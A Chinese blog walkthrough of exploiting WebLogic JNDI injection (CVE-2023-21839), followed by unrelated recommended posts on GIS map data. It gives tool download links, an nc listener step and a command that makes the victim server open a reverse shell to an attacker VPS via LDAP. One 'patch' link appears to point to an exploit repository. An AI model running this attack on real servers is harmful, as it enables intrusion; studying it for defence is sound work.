小白实战 | weblogic的JNDI注入漏洞

最新推荐文章于 2025-04-17 11:42:57 发布
最新推荐文章于 2025-04-17 11:42:57 发布
阅读量1.7k 收藏 8
点赞数 51
分类专栏: web渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/asanmaoa/article/details/139069548
版权

声明:

       该公众号大部分文章来自作者学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。

攻击原理

由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。

1.1 工具准备

(1)Weblogic-CVE-2023-21839

(2)JNDIExploit

(3)公网vps一台作为LDAP服务器

1.2 公网vps

(1)将JNDIExploit传到vps上。

下载地址

https://github.com/WhiteHSBG/JNDIExploit

图片

 (2)运行JNDI注入工具

图片

(3)使用nc开启监听端口 

图片

1.3 在本地执行命令进行攻击

(1)下载Weblogic-CVE-2023-21839

下载地址:

https://github.com/DXask88MA/Weblogic-CVE-2023-21839?tab=readme-ov-file

(2)运行Weblogic-CVE-2023-21839

java -jar Weblogic-CVE-2023-21839 受害服务器IP 端口 ldap://vps服务器ip:1389/Basic/ReverseShell/vps服务器ip/6666 

图片

1.4 漏洞存在

shell弹回VPS服务器

图片

漏洞危害

攻击者利用该漏洞可以访问敏感数据。

修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.oracle.com/security-alerts/cpujan2024.html

https://github.com/dinosn/CVE-2024-20931

https://glassyamadeus.github.io/2024/01/31/CVE_2024_20931/

全球各个国家或者地区的GIS矢量数据下载方式
热门推荐
weixin_44143671的博客
10-10 1万+
全球各个国家或者地区的GIS矢量数据下载方式 推荐一个 全球各个国家或者地区的GIS矢量数据下载链接:https://www.diva-gis.org/gdata 在Country一栏中可以选中自己想要的国家或者地区,然后在下面Subject栏目选中想要下载数据类型: 下面我们以泰国为例: 首先选中泰国的英文名称: 假如我们想下载行政区划数据,点进去出现Download按钮: 下载后...
最新全球行政区矢量数据下载(精确到县级)Globe_GADM.rar
03-07
最新全球行政区矢量数据下载(精确到县级)Globe_GADM.rar
全球国家边界矢量
12-23
全球国家边界矢量图。坐标系:GCS_WGS_1984,shp格式。
世界地图(shp格式,3.3M全),世界矢量
09-11
世界地图(shp格式,3.3M全),世界矢量
世界国家geojson大全——各国地图json数据下载
最新发布
gitblog_06718的博客
04-17 675
世界国家geojson大全——各国地图json数据下载下载地址】世界国家geojson大全各国地图json数据下载 “世界国家geojson大全”提供了全球所有国家/地区的geojson格式地图数据,源自“自然地球”数据集,适用于各种地图制作和地理信息展示需求。数据结构清晰,便于在应用程序中直接调用,兼容主流GIS软...
全球矢量数据(洲、国、首都、湖河shp)
03-14
全球矢量数据,wgs84坐标系,arcgis打开正常。(洲、国、首都、湖河、海洋shp)数据难寻,分享给大家
世界各国矢量地图
12-14
ARCgis最新世界各国矢量地图,包括河流,海洋,湖泊,国界线,海洋线等等
世界地图矢量数据
03-06
世界地图矢量数据_shp,世界地图矢量数据_shp
世界地图矢量
03-29
世界地图平面矢量文件,各国家分界线,经纬度,七大洲、五大洋。
全球免费矢量数据下载,使用这个插件就够啦
yunjinzh的专栏
09-12 1304
在QGIS2.18及以前的版本中,矢量菜单下有一个开放街道图的子菜单,可以免费下载OSM数据。 但到了3.X版本以后,矢量菜单中却没有了。想要下载数据应该怎么办呢? 还好在插件库中,有一个OSMDownloader,目前已经有15万+下载了。怎么使用呢?首先先安装下插件。 安装完毕后,在工具栏中便多了一个新的工具按钮,如红色箭头所示。 点击按钮后,在地图上绘制一个包含自己研究区域的矩形,范围越大下载耗时越长。 绘制完后,自动弹出一个对话框,设置下存储路径即可。可以勾选下载成功后
世界地图矢量 世界地图矢量
07-12
世界地图矢量 世界地图矢量 世界地图矢量 世界地图矢量 世界地图矢量 世界地图矢量 可以练习课设使用
高德地图矢量数据下载
gitblog_09795的博客
10-17 1542
高德地图矢量数据下载下载地址】高德地图矢量数据下载 高德地图矢量数据下载本仓库提供了一个资源文件的下载,主要内容为高德地图矢量数据 项目地址: https://gitcode.com/open-source-toolkit/...
2022新版 世界地图 国界地图 高清全彩矢量地图 CDR
03-02
基础数据参考OSM2021版及国家地理信息部公开国界划分含各国国旗、货币、时区、官方语言、人口、面积,采用arcGIS数据整理。Coreldraw最后效果制图,全矢量格式。arcgis信息源文件
世界矢量地图 全球行政边界 shp格式
03-18
世界矢量地图 全球行政边界 shp格式
全国矢量数据下载(更新)
04-15
全国矢量数据:全国行政区面数据边界数据,河流,道路,POI等数据
世界矢量地图数据shp格式.rar
01-11
《世界矢量地图数据shp格式详解与Python绘图应用》 在GIS(地理信息系统)领域,矢量地图数据是重要的组成部分,它以点、线、面的形式存储地理位置信息,具有高精度和易于操作的特点。"世界矢量地图数据shp格式.rar...
世界行政区划矢量数据_WGS1984.zip
04-08
《世界行政区划矢量数据_WGS1984》是一个重要的地理信息资源,它包含了全球206个国家的详细行政区域边界信息。这份数据集采用了WGS1984坐标系统,这是一种全球广泛使用的地心地固坐标系统,主要用于GPS导航、遥感...
世界各国矢量地图资源下载
gitblog_09732的博客
10-17 487
世界各国矢量地图资源下载下载地址】世界各国矢量地图资源下载 本仓库提供了一份最新的世界各国矢量地图资源文件,适用于ARCgis软件。该资源文件包含了丰富的地理信息,如河流、海洋、湖泊、国界线、海洋线等,能够满足用户在地理信息系统(GIS)中的多种需求 ...
世界地图矢量数据下载
08-04
世界地图矢量数据可以通过多种网站进行下载。以下是一些提供免费下载世界地图矢量数据的网站: 1. Open Street Map (https://www.openstreetmap.org/): 这个网站可以根据输入的经纬度或手动选定范围来导出目标区域的矢量图。导出的数据格式为osm格式,但只支持矩形范围的地图下载。 2. Geofabrik (http://download.geofabrik.de/): Geofabrik提供按洲际和国家快速下载全国范围的地图数据数据格式支持shape文件格式,包含多个独立图层,如道路、建筑、水域、交通、土地利用分类、自然景观等。数据每天更新一次。 3. bbbike (https://download.bbbike.org/osm/): bbbike提供全球主要的200多个城市的地图数据下载,也可以按照bbox进行下载。该网站还提供全球数据数据格式种类齐全,包括geojson、shp等。 4. GADM (https://gadm.org/index.html): GADM提供按国家或全球下载地图数据的服务。该网站提供多种格式的数据下载。 5. L7 AntV (https://l7.antv.antgroup.com/custom/tools/worldmap): L7 AntV是一个提供标准世界地图矢量数据免费下载的网站。支持多种数据格式下载,包括GeoJSON、KML、JSON、TopJSON、CSV和高清SVG格式等。可以下载中国省、市、县的矢量边界和世界各个国家的矢量边界数据。 以上这些网站都提供了世界地图矢量数据免费下载服务,你可以根据自己的需求选择合适的网站进行下载
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值